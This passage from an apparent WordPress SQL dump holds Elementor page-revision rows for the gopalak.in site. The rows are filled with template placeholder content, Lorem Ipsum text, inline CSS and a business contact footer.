https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 11:06:48','2022-10-03 05:36:48','',1373,'https://gopalak.in/?p=1522',0,'revision','',0),(1524,1,'2022-10-03 12:20:43','2022-10-03 06:50:43','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 12:20:43','2022-10-03 06:50:43','',1373,'https://gopalak.in/?p=1524',0,'revision','',0),(1525,1,'2022-10-03 12:20:43','2022-10-03 06:50:43','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a 